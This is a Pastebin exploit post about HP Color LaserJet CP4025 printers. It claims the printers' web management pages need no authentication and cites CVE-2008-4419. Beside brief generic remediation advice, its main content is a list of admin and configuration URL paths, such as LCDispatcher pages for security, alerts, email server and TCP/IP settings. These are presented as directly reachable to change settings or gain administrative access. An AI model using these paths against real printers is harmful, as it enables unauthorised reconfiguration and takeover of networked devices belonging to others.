Advertisement
KingSkrupellos

HP Color LaserJet CP4025 Printers Bypass Missing Auth

Apr 1st, 2019
122
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.88 KB | None | 0 0
  1. ############################################################################################
  2.  
  3. # Exploit Title : HP Color LaserJet CP4025 Printers 6.7.0.x Bypass Missing Authentication
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 31/03/2019
  7. # Vendor Homepage : hp.com
  8. # Software Information Link :
  9. support.hp.com/us-en/drivers/selfservice/hp-color-laserjet-enterprise-cp4025-printer-series/3965792
  10. # Software Version :
  11. Driver-Universal Print Driver => 6.1.0.20062 and 6.7.0.23989
  12. Driver-Universal Print Driver for Managed Services => Version 6.7.0.23989
  13. Example Printer Model Number => CC490A - CCXXXA
  14. Basic Drivers => 61.155.01.16418
  15. Driver-USB => Version 7.0.0.29
  16. Firmware => Version 07.250.2 - 20150120 07.171.9
  17. Software Universal Printer Driver => Version 1.8.6
  18. Utility => Version 1.0
  19. # Tested On : Windows and Linux
  20. # Category : WebApps
  21. # Exploit Risk : High
  22. # CVE : CVE-2008-4419
  23. # Vulnerability Type : CWE-306 [ Missing Authentication for Critical Function ]
  24. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  25. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  26. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  27.  
  28. ############################################################################################
  29.  
  30. # Description about Software :
  31. ***************************
  32. HP LaserJet as a brand name identifies the line of dry electrophotographic DEP laser printers marketed by the American
  33.  
  34. computer company Hewlett-Packard (HP). The HP LaserJet was the world's first desktop laser printer.
  35.  
  36. ############################################################################################
  37.  
  38. # Impact :
  39. ***********
  40. The software does not perform any authentication for functionality that requires a provable user identity
  41.  
  42. or consumes a significant amount of resources.
  43.  
  44. The vulnerability allows a remote unauthenticated attacker to send specially crafted HTTP request to the
  45.  
  46. affected application and change configuration settings or gain administrative access.
  47.  
  48. Missing authentication for critical function is a language independent issue that can appear in any multiuser environment.
  49.  
  50. Developing a fix would require understanding of the current application security model and implemented access controls.
  51.  
  52. Three basic rules however can help you eliminate potential improper authorization issues:
  53.  
  54. 1) Identify all privileged assets within your application (web pages that display sensitive data,
  55. website sections that contain privileged/administrative functionality, etc.)
  56.  
  57. 2) Identify user roles within the application and their access permissions
  58.  
  59. 3) Always check if the user should have privileges to access the asset
  60.  
  61. ############################################################################################
  62.  
  63. # Bypass Missing Authentication Exploit / Vulnerability :
  64. *************************************************
  65. /hp/device/this.LCDispatcher
  66.  
  67. /hp/device/this.LCDispatcher?nav=hp.EmailServer
  68.  
  69. /hp/device/this.LCDispatcher?nav=hp.Alerts&subpage=1&lstid=-1
  70.  
  71. /hp/device/this.LCDispatcher?nav=hp.Alerts&subpage=3&lstid=1
  72.  
  73. /hp/device/this.LCDispatcher?nav=hp.Alerts
  74.  
  75. /hp/device/this.LCDispatcher?nav=hp.AutoSend
  76.  
  77. /hp/device/this.LCDispatcher?nav=hp.Security&fldPage=0
  78.  
  79. /hp/device/this.LCDispatcher?nav=hp.OtherLinks
  80.  
  81. /hp/device/this.LCDispatcher?nav=hp.Config
  82.  
  83. /hp/device/this.LCDispatcher?nav=hp.DeviceInfoConfig
  84.  
  85. /config_pro.htm
  86. /tcpipv6.htm
  87. /tcpipv4.htm
  88.  
  89. /tcp_param.htm
  90. /network_id.htm
  91.  
  92. /tcp_summary.htm
  93. /index_info.htm
  94.  
  95. /support_param.html
  96. /support.htm
  97.  
  98. /tcp_diag.htm
  99. /configpage.htm
  100.  
  101. /tcp_param.htm
  102. /network_id.htm
  103.  
  104. ############################################################################################
  105.  
  106. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  107.  
  108. ############################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement